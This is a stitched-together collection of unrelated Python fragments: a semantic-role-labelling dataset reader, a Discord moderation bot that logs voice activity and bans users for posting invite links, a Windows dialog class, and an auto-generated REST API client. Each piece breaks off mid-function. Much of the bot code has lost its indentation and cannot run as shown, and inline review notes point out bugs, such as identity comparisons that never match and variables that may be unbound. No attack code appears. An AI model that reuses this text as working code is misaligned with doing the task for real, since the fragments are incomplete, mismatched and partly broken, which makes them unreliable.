verb_label = [0 for _ in tokens]
yield self.text_to_instance(tokens, verb_label, tags)
else:
for (_, tags) in sentence.srl_frames:
verb_indicator = [1 if label[-2:] == "-V" else 0 for label in tags]
# for i in range(len(tags)):
# if tags[i] != 'O':
# tags[i] = 'I-ARG1'
yield self.text_to_instance(tokens, verb_indicator, tags)
@staticmethod
def _ontonotes_subset(ontonotes_reader: Ontonotes,
file_path: str,
domain_identifier: str) -> Iterable[OntonotesSentence]:
"""
Iterates over the Ontonotes 5.0 dataset using an optional domain identifier.
If the domain identifier is present, only examples which contain the domain
identifier in the file path are yielded.
"""
for conll_file in ontonotes_reader.dataset_path_iterator(file_path):
if domain_identifier is None or f"/{domain_identifier}/" in conll_file:
yield from ontonotes_reader.sentence_iterator(conll_file)
def text_to_instance(self, # type: ignore
tokens: List[Token],
verb_label: List[int],
tags: List[str] = None) -> Instance:
"""
We take `pre-tokenized` input here, along with a verb label. The verb label should be a
one-hot binary vector, the same length as the tokens, indicating the position of the verb
to find arguments for.
"""
# pylint: disable=arguments-differ
metadata_dict: Dict[str, Any] = {}
if self.bert_tokenizer is not None:
wordpieces, offsets, start_offsets = self._wordpiece_tokenize_input([t.text for t in tokens])
new_verbs = _convert_verb_indices_to_wordpiece_indices(verb_label, offsets)
metadata_dict["offsets"] = start_offsets
# In order to override the indexing mechanism, we need to set the `text_id`
# attribute directly. This causes the indexing to use this id.
text_field = TextField([Token(t, text_id=self.bert_tokenizer.vocab[t]) for t in wordpieces],
token_indexers=self._token_indexers)
verb_indicator = SequenceLabelField(new_verbs, text_field)
else:
text_field = TextField(tokens, token_indexers=self._token_indexers)
verb_indicator = SequenceLabelField(verb_label, text_field)
fields: Dict[str, Field] = {}
fields['tokens'] = text_field
| |
Kick from voice channel
kick_channel = discord.Object(id=afkChan)
await bot.move_member(member, kick_channel)
# else:
# embed=discord.Embed(title="Permission Denied.", description="You don't have permission to use this command.", color=0xff00f6)
# await bot.say(embed=embed)
@bot.command(pass_context = True, description = "Removes shitpost tag.")
async def cleanpost(ctx, member: discord.Member):
    """Remove the shitpost punishment from `member`: announce it in the log
    channel, strip the role, and delete the on-disk punishment record.

    Only runs on the main server and only for callers passing is_rep().
    """
    if ctx.message.server.id == mainServ and is_rep(ctx.message):
        filePath = curDir + '/logs/db/' + member.id
        embed=discord.Embed(title="Good Job!", description="**{0}** it seems **{1}** has faith in you.".format(member, ctx.message.author), color=0x27d300)
        # await bot.say(embed=embed)
        await bot.send_message(discord.Object(id=logAct),embed=embed)
        await remove_roles(member, 'cleanpost')
        # Clear punishment record. A missing file is fine (nothing to clear),
        # but the old bare `except: pass` also hid unrelated bugs — only
        # filesystem errors are swallowed now.
        try:
            os.remove(filePath + '.punish')
        except OSError:
            pass
############################
############################
@bot.event
async def on_voice_state_update(before,after):
    """Voice-state change handler (discord.py 0.16: both args are Members).

    Responsibilities:
      1. Log joins / leaves / channel switches as embeds to the admin log
         channel and mirror them via ``log_backup_embed``.
      2. Early-out when the member stayed in the same channel.
      3. "Unhide" voice channels: grant/remove the role mapped to each
         voice channel in include/voice (CSV rows: channel_id,role_id).
    """
    # NOTE(review): `is` tests object identity and discord.Object(...) is a
    # freshly created wrapper, so this comparison is always False -- the
    # ignore-server guard never fires.  Comparing .id values was likely
    # intended; left untouched here (documentation-only pass).
    no = discord.Object(id=ignoreServ)
    if before.server is no:
        return
    # if before.voice.voice_channel is None and before.id == '153999612485566464':
    # msg = '<@153999612485566464> HEY SHUTUP!!'
    # channel = discord.Object(id=shetChan)
    # temp = await bot.send_message(channel, msg)
    # await bot.server_voice_state(member=after, mute=True)
    # await asyncio.sleep(15)
    # await bot.delete_message(temp)
    # await bot.server_voice_state(member=after, mute=False)
    # A join or a leave: at least one side has no voice channel.
    if before.voice.voice_channel is None or after.voice.voice_channel is None:
        if before.voice.voice_channel is None and after.voice.voice_channel is not None:
            # Member joined a voice channel.
            # role color 117EA6 green 23D160
            try:
                logit = discord.utils.get(before.server.channels, id = adminLogs)
            except:
                pass
            embed=discord.Embed(description="**" + before.mention + " joined voice channel #" + after.voice_channel.name + "**\n", color=0x23d160)
            pfp = get_avatar(before)
            embed.set_author(name=before, icon_url=pfp)
            embed.set_footer(text="ID: " + before.id + " • Today at " + f"{datetime.now():%I:%M %p}")
            await bot.send_message(logit, embed=embed)
            await log_backup_embed(embed)
        if after.voice.voice_channel is None and before.voice.voice_channel is not None:
            # Member left a voice channel.
            try:
                logit = discord.utils.get(after.server.channels, id = adminLogs)
            except:
                pass
            embed=discord.Embed(description="**" + after.mention + " left voice channel #" + before.voice_channel.name + "**\n", color=0x23d160)
            pfp = get_avatar(after)
            embed.set_author(name=after, icon_url=pfp)
            embed.set_footer(text="ID: " + after.id + " • Today at " + f"{datetime.now():%I:%M %p}")
            await bot.send_message(logit, embed=embed)
            await log_backup_embed(embed)
    # Same channel object on both sides -> mute/deafen toggle etc.: done.
    if after.voice_channel is before.voice_channel:
        return
    else:
        # Channel switch.  This branch is also reached after a join/leave
        # (one side is None); the embed below then raises AttributeError on
        # `.name` and is deliberately swallowed by the bare except.
        try:
            logit = discord.utils.get(before.server.channels, id = adminLogs)
        except:
            pass
        try:
            embed=discord.Embed(description="**" + after.mention + " switched voice channel `#" + before.voice.voice_channel.name + "` -> `#" + after.voice.voice_channel.name + "`**", color=0x23d160)
            pfp = get_avatar(after)
            embed.set_author(name=after, icon_url=pfp)
            embed.set_footer(text="ID: " + after.id + " • Today at " + f"{datetime.now():%I:%M %p}")
            await bot.send_message(logit, embed=embed)
            await log_backup_embed(embed)
        except:
            pass
    # Unhide voice channels
    # include/voice holds one "channel_id,role_id" CSV row per line.
    with open(curDir + '/include/voice') as v:
        voiceID = [line.strip('\n').split(',') for line in v]
    # NOTE(review): indexing with x-1 starts at voiceID[-1]; every row is
    # still visited, just in rotated order -- presumably unintentional but
    # harmless.
    for x in range(len(voiceID)):
        try:
            if int(after.voice.voice_channel.id) == int(voiceID[x-1][0]):
                add = discord.utils.get(after.server.roles, id = voiceID[x-1][1])
        except:
            pass
        try:
            if int(before.voice.voice_channel.id) == int(voiceID[x-1][0]):
                rmv = discord.utils.get(before.server.roles, id = voiceID[x-1][1])
        except:
            pass
    # NOTE(review): `add`/`rmv` are unbound when no row matched; the except
    # hides the NameError for this comparison, but the role calls below can
    # still raise it into the event loop.
    try:
        if rmv is add:
            return
    except:
        pass
    if after.voice.voice_channel is not None:
        # Joined/switched: grant the new channel's role, then retry removing
        # the previous one until the grant is visible on the member.
        await bot.add_roles(after, add)
        while True:
            if add in after.roles:
                try:
                    await bot.remove_roles(after, rmv)
                    break
                except:
                    break
            else:
                await bot.add_roles(after, add)
    elif after.voice.voice_channel is None:
        # Left voice entirely: keep removing until the role is really gone.
        await bot.remove_roles(after, rmv)
        while True:
            if rmv in after.roles:
                await bot.remove_roles(after, rmv)
            else:
                break
    return
    # if before.voice.voice_channel is not None:
    # for x in range(len(voiceID)):
    # if int(before.voice.voice_channel.id) == int(voiceID[x-1][0]):
    # hide = discord.utils.get(after.server.roles, id = voiceID[x-1][1])
    # await asyncio.sleep(5)
    # if int(before.voice.voice_channel.id) == int(voiceID[x-1][0]):
    # await bot.remove_roles(after, hide)
    # break
    # elif before.voice.voice_channel is None and after.voice.voice_channel is not None:
    # for x in range(len(voiceID)):
    # if int(after.voice.voice_channel.id) == int(voiceID[x-1][0]):
    # add = discord.utils.get(after.server.roles, id = voiceID[x-1][1])
    # await bot.add_roles(after, add)
    # break
############################
############################
############################
############################
@bot.event
async def on_message(message):
# Stops bot from replying to self
if message.author == bot.user or message.author.bot:
return
# with open(curDir + '/include/special') as a:
# special = [line.strip('\n').split(',') for line in a]
# #TODO: [var] is not good solution
# if [str(message.author.id)] in special:
# print('found ' + str(message.name))
no = discord.Object(id=ignoreServ)
if message.server is no:
return
############################
############################
if is_legacy(message) and not is_in_trouble(message):
serious = discord.utils.get(message.author.server.roles, id = seriousRole)
await bot.add_roles(message.author, serious)
#++++++++++++++++++++++++++#
#++++++++++++++++++++++++++#
if is_mod(message):
pass
elif is_trusted(message):
pass
else:
if is_invite(message) and message.server.id == mainServ:
embed=discord.Embed(title="Banned!", description="**{0}** was given Banned by **ZigBot#1002** for violation of rule 8!".format(message.author), color=0xd30000)
await bot.send_message(discord.Object(id=logAct),embed=embed)
await bot.send_message(message.author, 'It\'s in the rules, no sharing discord links.\n Bye bye!')
await bot.ban(message.author)
# await bot.kick(message.author)
await bot.delete_message(message)
return
if is_aids(message) and int(message.channel.id) != int(shetChan):
msg = await bot.send_message(message.channel, 'Alright, ' + message.author.mention + ' stop abusing the new toy.')
await bot.delete_message(message)
await asyncio.sleep(10)
await bot.delete_message(msg)
if is_caps(message) and int(message.channel.id) != int(shetChan):
await bot.send_message(message.channel, 'Alright, ' + message.author.mention + ' has been warned for \'**Capital letters**\'.')
if len(message.mentions) >= 5:
await bot.send_message(message.channel, 'Alright, ' + message.author.mention + ' has been shitposted for \'**Mass mentions**\'.')
await punish_shitpost(message)
#++++++++++++++++++++++++++#
#++++++++++++++++++++++++++#
# if is_caps(message):
# lowered = message.content.lower()
# msg = await bot.send_message(message.channel, "||*turns caps off*|| " + str(message.author) + " ***Said:*** - " + lowered)
# await bot.delete_message(message)
# if not is_mod:
# await asyncio.sleep(60)
# await bot.delete_message(msg)
if message.content.lower().startswith('!refuel'):
msg = await bot.send_message(message.channel,'Helicopter is refueled and ready to... physically remove... so to speak...\nhttps://cdn.discordapp.com/attachments/509245339664908299/522448178138578964/1512796577930.gif')
await bot.delete_message(message)
await asyncio.sleep(timeout)
await bot.delete_message(msg)
if is_polchan(message):
if message.content.lower().startswith('poll:'):
await bot.add_reaction(message, '\U0001F44D')
await bot.add_reaction(message, '\U0001F44E')
await bot.add_reaction(message, '\U0001F937')
else:
msg = await bot.send_message(message.channel, '**Your message will be removed. __Copy it now!__**\nYou can read this message after you copy yours.\n\nThis is not in a valid poll format "Poll: ".\nIf this was poll, please type "Poll: " first, then paste in your message.\nIf this is not a poll, continue the discussion in <#549269596926902282>.\nThank you.')
await asyncio.sleep(30)
await bot.delete_message(message)
await asyncio.sleep(60)
await bot.delete_message(msg)
if is_polenabled(message):
if message.content.lower().startswith('poll:'):
await bot.add_reaction(message, '\U0001F44D')
await bot.add_reaction(message, '\U0001F44E')
await bot.add_reaction(message, '\U0001F937')
if ' iq' in message.content.lower() or 'iq ' in message.content.lower():
msg = await bot.send_message(message.channel, message.author.mention + ', there are better arguments than IQ to make your case.\nhttps://www.independent.co.uk/news/science/iq-tests-are-fundamentally-flawed-and-using-them-alone-to-measure-intelligence-is-a-fallacy-study-8425911.html\nhttps://www.cell.com/neuron/fulltext/S0896-6273(12)00584-3')
await asyncio.sleep(timeout)
await bot.delete_message(msg)
# if 'smart' in message.content.lower():
# x = randint(0,5)
# brainletURL = brainlet[x].rstrip()
# msg = await bot.send_message(message.channel, 'I is r b smartr den u.\n' + brainletURL)
# await asyncio.sleep(5)
# await bot.delete_message(msg)
if message.content.startswith('!disboard bump'):
# Needed vars
bumServ = message.server.id
bumChan = message.channel.id
bumMemb = message.author.id
channel = discord.Object(id=bumChan)
curTime = datetime.now()
newTime = datetime.now() + timedelta(hours=2)
filePath = curDir + '/logs/db/' + bumServ
# Replaces member and channel
# Old info not needed only updated
oldMemb = open(filePath + '.member', 'w+')
oldMemb.write("%s\r\n" % (bumMemb))
oldMemb.close()
oldChan = open(filePath + '.channel', 'w+')
oldChan.write("%s\r\n" % (bumChan))
oldChan.close()
# Loads existing needed time data
# If not found, creates data
try:
t = open(filePath + '.time')
tStrip = t.readlines()
oldTime = tStrip[0].rstrip()
except:
t = open(filePath + '.time', 'w+')
t.write("%s\r\n" % (str(newTime)))
oldTime = str(newTime)
t.close()
lastBump = datetime.strptime(oldTime, dateFormat)
# Tests if 2 hours has passed
# If not, it lets you know it'll remind you later
# It always updates member and channel
if curTime < lastBump:
diff = int(int((lastBump - curTime).seconds)/60) + 1
await bot.send_message(channel, 'I\'ll remind you to bump here in ' + str(diff) + ' minutes.')
else:
await bot.send_message(channel, 'I\'ll remind you in 120 mins to bump disboard again.')
t = open(filePath + '.time', 'w+')
t.write("%s\r\n" % (str(newTime)))
t.close()
# allow disboard bump stop
if message.content.startswith('!disboard stop') and message.author.server_permissions.administrator:
disboard = discord.utils.get(message.server.members, name='DISBOARD')
bumServ = message.server.id
bumChan = message.channel.id
filePath = curDir + '/logs/db/' + bumServ
channel = discord.Object(id=bumChan)
msg = await bot.wait_for_message(timeout=3, author=disboard)
try:
os.remove(filePath + '.time')
await bot.delete_message(msg)
await bot.send_message(channel, 'I\'ll stop reminding you for now. `!disboard bump` to start again.')
except:
await bot.send_message(channel, 'I\'m already set to not remind you. Please `!disboard bump` to start again.')
if message.content.lower().startswith('.iam busy') and message.author.server.id == mainServ:
if message.author.server_permissions.administrator:
msg = await bot.send_message(message.channel,'As much as I would like to, I\'m not able to set you to busy.\n It\'s out of my power.')
await bot.delete_message(message)
await asyncio.sleep(10)
await bot.delete_message(msg)
return
error = discord.utils.get(message.server.members, name='ZigBot')
msg = await bot.wait_for_message(timeout=3, author=error)
await bot.delete_message(msg)
filePath = curDir + '/logs/db/' + message.author.id
roles_busy = list(message.author.roles)
with open(filePath + '.busy', 'w+') as f:
for x in range(len(roles_busy)):
f.write('%s\n' % roles_busy[x-1].id)
await bot.remove_roles(message.author, roles_busy[x-1])
await asyncio.sleep(2e-2)
addRole = discord.utils.get(message.server.roles, id = busyRole)
await bot.add_roles(message.author, addRole)
await bot.delete_message(message)
return
if message.content.lower().startswith('.iamn busy') and message.author.server.id == mainServ:
error = discord.utils.get(message.server.members, name='ZigBot')
msg = await bot.wait_for_message(timeout=3, author=error)
await bot.delete_message(msg)
filePath = curDir + '/logs/db/' + message.author.id
with open(filePath + '.busy') as f:
roles_active = [line.strip('\n') for line in f]
for x in range(len(roles_active)):
addRole = discord.utils.get(message.server.roles, id = str(roles_active[x-1]))
await bot.add_roles(message.author, addRole)
await asyncio.sleep(2e-2)
rmRole = discord.utils.get(message.server.roles, id = busyRole)
await bot.remove_roles(message.author, rmRole)
| |
field_t, field_w, field_h), cs | field_styles])
if callback:
dlg.append (["BUTTON", "...", self.IDC_CALLBACK_BASE + i, (field_l + field_w + self.GUTTER_W, field_t, self.CALLBACK_W, self.CONTROL_H), cs | win32con.WS_TABSTOP | win32con.BS_PUSHBUTTON])
control_t += display_h + self.GUTTER_H
i += 1
if self.progress_callback:
self._progress_id = self.IDC_FIELD_BASE + i
field_t = control_t
field_w = self.W - (2 * self.GUTTER_W)
field_l = self.GUTTER_W
field_h = self.CONTROL_H
field_styles = win32con.SS_LEFT
dlg.append (["STATIC", None, self.IDC_FIELD_BASE + i, (field_l, field_t, field_w, field_h), cs | field_styles])
control_t += field_h + self.GUTTER_H
cs = win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_TABSTOP | win32con.BS_PUSHBUTTON
button_t = control_t
for i, (caption, id) in enumerate (reversed (self.BUTTONS)):
field_h = self.CONTROL_H
dlg.append (["BUTTON", caption, id, (self.W - ((i + 1) * (self.GUTTER_W + self.BUTTON_W)), button_t, self.BUTTON_W, field_h), cs])
control_t += field_h + self.GUTTER_H
dlg.insert (0, [self.title, (0, 0, self.W, control_t), style, None, (9, "Lucida Sans Unicode"), None, dlg_class_name])
return dlg
class Dialog (BaseDialog):
ur"""A general-purpose dialog class for collecting arbitrary information in
text strings and handing it back to the user. Only Ok & Cancel buttons are
allowed, and all the fields are considered to be strings. The list of
fields is of the form: [(label, default), ...] and the values are saved
in the same order.
"""
def __init__ (self, title, fields, progress_callback=core.UNSET, parent_hwnd=0):
    ur"""Initialise the dialog with a title and a list of fields of
    the form [(label, default), ...].

    :param title: caption text for the dialog window
    :param fields: non-empty iterable of field definitions; a private
      copy is taken so the caller's list is not aliased
    :param progress_callback: optional callable used to drive the
      progress line; core.UNSET means "no progress support"
    :param parent_hwnd: handle of the owning window (0 => desktop)
    :raises RuntimeError: if *fields* is empty
    """
    BaseDialog.__init__ (self, title, parent_hwnd)
    self.progress_callback = progress_callback
    # Copy so later mutation by the caller cannot affect the dialog.
    self.fields = list (fields)
    if not self.fields:
        raise RuntimeError ("Must pass at least one field")
    self.results = []
    self.progress_thread = core.UNSET
    # Manual-reset event (2nd arg = 1), initially unsignalled; signalled
    # when the user cancels a running progress operation.
    self.progress_cancelled = win32event.CreateEvent (None, 1, 0, None)
def run (self):
    ur"""The heart of the dialog box functionality. The call to DialogBoxIndirect
    kicks off the dialog's message loop, finally returning via the EndDialog call
    in OnCommand.

    :returns: whatever DialogBoxIndirect returns when the dialog is ended
    """
    # Route window messages to handler methods; DialogBoxIndirect pumps
    # messages until EndDialog is invoked (from OnCommand).
    message_map = {
        win32con.WM_COMMAND: self.OnCommand,
        win32con.WM_INITDIALOG: self.OnInitDialog,
        win32con.WM_SIZE: self.OnSize,
        win32con.WM_GETMINMAXINFO : self.OnMinMaxInfo,
        self.WM_PROGRESS_MESSAGE : self.OnProgressMessage,
        self.WM_PROGRESS_COMPLETE : self.OnProgressComplete
    }
    return wrapped (
        win32gui.DialogBoxIndirect,
        self.hinst,
        self._get_dialog_template (),
        self.parent_hwnd,
        message_map
    )
def corners (self, l, t, r, b):
    r"""Hook point for subclasses (eg :class:`InfoDialog`) to adjust the
    dialog rectangle; this base implementation hands the coordinates
    straight back unchanged.
    """
    return (l, t, r, b)
def OnInitDialog (self, hwnd, msg, wparam, lparam):
    ur"""Attempt to position the dialog box more or less in
    the middle of its parent (possibly the desktop). Then
    force a resize of the dialog controls which should take
    into account the different label lengths and the dialog's
    new size.
    """
    self.hwnd = hwnd
    #
    # If you want to have a translucent dialog,
    # enable the next block.
    #
    if False:
        wrapped (
            win32gui.SetWindowLong,
            self.hwnd,
            win32con.GWL_EXSTYLE,
            win32con.WS_EX_LAYERED | wrapped (
                win32gui.GetWindowLong,
                self.hwnd,
                win32con.GWL_EXSTYLE
            )
        )
        wrapped (
            win32gui.SetLayeredWindowAttributes,
            self.hwnd,
            255,
            (255 * 80) / 100,
            win32con.LWA_ALPHA
        )
    # Register the dialog as an OLE drop target so files can be dragged
    # onto it; _DropTarget handles the actual drop events.
    pythoncom.RegisterDragDrop (
        hwnd,
        pythoncom.WrapObject (
            _DropTarget (hwnd),
            pythoncom.IID_IDropTarget,
            pythoncom.IID_IDropTarget
        )
    )
    # Seed every field control with its configured default value.
    for i, (field, default, callback) in enumerate (self.fields):
        id = self.IDC_FIELD_BASE + i
        self._set_item (id, default)
    # Centre the (width-clamped) dialog on its parent window.
    parent = self.parent_hwnd or DESKTOP
    l, t, r, b = self.corners (*wrapped (win32gui.GetWindowRect, self.hwnd))
    r = min (r, l + self.MAX_W)
    dt_l, dt_t, dt_r, dt_b = wrapped (win32gui.GetWindowRect, parent)
    cx = int (round ((dt_r - dt_l) / 2))
    cy = int (round ((dt_b - dt_t) / 2))
    centre_x, centre_y = wrapped (win32gui.ClientToScreen, parent, (cx, cy))
    dx = int (round (centre_x - (r / 2)))
    dy = int (round (centre_y - (b / 2)))
    wrapped (win32gui.MoveWindow, self.hwnd, dx, dy, r - l, b - t, 0)
    # Force an initial layout pass now that the final size is known.
    l, t, r, b = wrapped (win32gui.GetClientRect, self.hwnd)
    self._resize (r - l, b - t, 0)
    return True
def _resize (self, dialog_w, dialog_h, repaint=1):
    ur"""Attempt to resize the controls on the dialog, spreading
    them horizontally to cover the full extent of the dialog
    box, with left-aligned labels and right-aligned buttons.
    """
    def coords (hwnd, id):
        # Return a dialog control plus its client-relative bounding box.
        ctrl = wrapped (win32gui.GetDlgItem, hwnd, id)
        l, t, r, b = wrapped (win32gui.GetWindowRect, ctrl)
        l, t = wrapped (win32gui.ScreenToClient, hwnd, (l, t))
        r, b = wrapped (win32gui.ScreenToClient, hwnd, (r, b))
        return ctrl, l, t, r, b
    # Width of the widest label determines the label column width.
    hDC = wrapped (win32gui.GetDC, self.hwnd)
    try:
        label_w, label_h = max (wrapped (win32gui.GetTextExtentPoint32, hDC, label or "") for label, _, _ in self.fields)
    finally:
        wrapped (win32gui.ReleaseDC, self.hwnd, hDC)
    # NOTE(review): the bare `MoveWindow` calls below are unqualified, unlike
    # the `wrapped (win32gui.MoveWindow, ...)` form used elsewhere in this
    # class -- presumably a module-level alias defined earlier in the file;
    # verify it exists.
    for i, (field, default, callback) in enumerate (self.fields):
        if field is not None:
            # Left-align the label, then lay the field out to its right.
            label, l, t, r, b = coords (self.hwnd, self.IDC_LABEL_BASE + i)
            wrapped (win32gui.MoveWindow, label, self.GUTTER_W, t, label_w, b - t, repaint)
            label_r = self.GUTTER_W + label_w
            if callback:
                # The "..." callback button keeps its size, pinned right.
                callback_button, l, t, r, b = coords (self.hwnd, self.IDC_CALLBACK_BASE + i)
                callback_w = r - l
                callback_l = dialog_w - self.GUTTER_W - callback_w
                MoveWindow (callback_button, callback_l, t, r - l, b - t, repaint)
            else:
                callback_w = 0
        else:
            label_r = callback_w = 0
        # Field stretches between the label column and the callback button.
        field, l, t, r, b = coords (self.hwnd, self.IDC_FIELD_BASE + i)
        field_l = label_r + self.GUTTER_W
        field_w = dialog_w - self.GUTTER_W - field_l - (callback_w + self.GUTTER_W if callback_w else 0)
        MoveWindow (field, field_l, t, field_w, b - t, repaint)
    if self._progress_id:
        # Progress line spans the full dialog width minus the gutters.
        field, l, t, r, b = coords (self.hwnd, self._progress_id)
        field_w = dialog_w - 2 * self.GUTTER_W
        MoveWindow (field, l, t, field_w, b - t, repaint)
    # Buttons are laid out right-to-left from the dialog's right edge.
    for i, (caption, id) in enumerate (reversed (self.BUTTONS)):
        button, l, t, r, b = coords (self.hwnd, id)
        MoveWindow (button, dialog_w - ((i + 1) * (self.GUTTER_W + (r - l))), t, r - l, b - t, repaint)
def _get_item (self, item_id):
    ur"""Return the current value of an item in the dialog.

    The control's window class determines how the value is read:
    Edit -> decoded text, Button -> checked state as bool, ComboBox ->
    the originally-supplied option at the current selection index,
    Static -> None (display only).

    :raises RuntimeError: for an unrecognised control class
    """
    hwnd = wrapped (win32gui.GetDlgItem, self.hwnd, item_id)
    class_name = wrapped (win32gui.GetClassName, hwnd)
    if class_name == "Edit":
        try:
            #
            # There is a bug/feature which prevents empty dialog items
            # from having their text read. Assume any error means that
            # the control is empty.
            #
            return wrapped (win32gui.GetDlgItemText, self.hwnd, item_id).decode ("mbcs")
        except:
            return ""
    elif class_name == "Button":
        return bool (SendMessage (hwnd, win32con.BM_GETCHECK, 0, 0))
    elif class_name == "ComboBox":
        # The stored default is the option list; index it by the current
        # combo-box selection to recover the chosen value.
        field, default, callback = self.fields[item_id - self.IDC_FIELD_BASE]
        return default[SendMessage (hwnd, win32con.CB_GETCURSEL, 0, 0)]
    elif class_name == "Static":
        return None
    else:
        raise RuntimeError ("Unknown class: %s" % class_name)
def _set_item (self, item_id, value):
    ur"""Set the current value of an item in the dialog.

    Dispatches on the control's window class: Edit controls receive
    text (dates are formatted, newlines normalised to CRLF), Buttons a
    check state, ComboBoxes are populated from an iterable of options
    (tuples contribute their first element) with the first selected,
    and Static controls receive display text.

    :raises RuntimeError: for an unrecognised control class
    """
    item_hwnd = wrapped (win32gui.GetDlgItem, self.hwnd, item_id)
    class_name = wrapped (win32gui.GetClassName, item_hwnd)
    # NOTE(review): `styles` is fetched but never used below (only the
    # commented-out checkbox/radio discrimination referenced it).
    styles = wrapped (win32gui.GetWindowLong, self.hwnd, win32con.GWL_STYLE)
    if class_name == "Edit":
        if isinstance (value, datetime.date):
            value = value.strftime ("%d %b %Y")
        # Edit controls expect CRLF line endings; normalise to \n first so
        # pre-existing \r\n pairs are not doubled.
        value = unicode (value).replace (u"\r\n", u"\n").replace (u"\n", u"\r\n")
        wrapped (win32gui.SetDlgItemText, self.hwnd, item_id, value)
    elif class_name == "Button":
        #~ if styles & win32con.BS_CHECKBOX:
        SendMessage (item_hwnd, win32con.BM_SETCHECK, int (value), 0)
        #~ elif styles & win32con.BS_RADIOBUTTON:
    elif class_name == "ComboBox":
        # Populate the combo from the option iterable and select the first.
        for item in value:
            if isinstance (item, tuple):
                item = item[0]
            SendMessage (item_hwnd, win32con.CB_ADDSTRING, 0, utils.string_as_pointer (str (item)))
        SendMessage (item_hwnd, win32con.CB_SETCURSEL, 0, 0)
    elif class_name == "Static":
        wrapped (win32gui.SetDlgItemText, self.hwnd, item_id, unicode (value))
    else:
        raise RuntimeError ("Unknown class: %s" % class_name)
def OnSize (self, hwnd, msg, wparam, lparam):
    """Keep the child controls laid out to match the dialog's new
    client size whenever the user resizes the window.
    """
    new_w = win32api.LOWORD (lparam)
    new_h = win32api.HIWORD (lparam)
    self._resize (new_w, new_h)
    return 0
def OnMinMaxInfo (self, hwnd, msg, wparam, lparam):
    ur"""Prevent the dialog from resizing vertically by extracting
    the window's current size and using the minmaxinfo message
    to set the maximum & minimum window heights to be its current height.
    """
    dlg_l, dlg_t, dlg_r, dlg_b = wrapped (win32gui.GetWindowRect, hwnd)
    #
    # If returning from minimization, do nothing
    #
    if wrapped (win32gui.GetClientRect, hwnd) == (0, 0, 0, 0):
        return 0
    #
    # MINMAXINFO is a struct of 5 POINT items, each of which
    # is a pair of LONGs. We extract the structure into a list,
    # set the Y coord of MaxTrackSize and of MinTrackSize to be
    # the window's current height and write the data back into
    # the same place.
    #
    POINT_FORMAT = "LL"
    MINMAXINO_FORMAT = 5 * POINT_FORMAT
    data = win32gui.PyGetString (lparam, struct.calcsize (MINMAXINO_FORMAT))
    minmaxinfo = list (struct.unpack (MINMAXINO_FORMAT, data))
    # Flat indices 7 and 9 are the Y members of ptMinTrackSize and
    # ptMaxTrackSize respectively; pinning both to the current height
    # forbids any vertical resize.
    minmaxinfo[9] = minmaxinfo[7] = dlg_b - dlg_t
    win32gui.PySetMemory (lparam, struct.pack (MINMAXINO_FORMAT, *minmaxinfo))
return | |
(optional)
:param int id: (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method status_stack" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `status_stack`")
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/stacks/{id}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_gateway_topologies(self, id, **kwargs):
    """
    update topologies of a gateway
    Gateway is an Apache Knox Gateway, which is an Application Gateway for interacting with REST APIs andUIs of Apache Hadoop deployments. Provides Authentication and other services.
    By default this performs a synchronous HTTP request; supply a
    `callback` keyword argument to make the call asynchronous instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.update_gateway_topologies(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int id: (required)
    :param UpdateGatewayTopologiesJson body:
    :return: GatewayJson
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper only ever want the deserialized
    # payload, never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous path: hand back the request thread immediately.
        return self.update_gateway_topologies_with_http_info(id, **kwargs)
    data = self.update_gateway_topologies_with_http_info(id, **kwargs)
    return data
def update_gateway_topologies_with_http_info(self, id, **kwargs):
    """
    update topologies of a gateway
    Gateway is an Apache Knox Gateway, which is an Application Gateway for interacting with REST APIs andUIs of Apache Hadoop deployments. Provides Authentication and other services.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.update_gateway_topologies_with_http_info(id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int id: (required)
    :param UpdateGatewayTopologiesJson body:
    :return: GatewayJson
        If the method is called asynchronously,
        returns the request thread.
    """
    # Every keyword this endpoint understands; anything else is a caller
    # error and is rejected below.
    all_params = ['id', 'body']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Validate caller-supplied kwargs and flatten them into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_gateway_topologies" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `update_gateway_topologies`")
    collection_formats = {}
    # `id` is interpolated into the URL path, not the query string.
    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
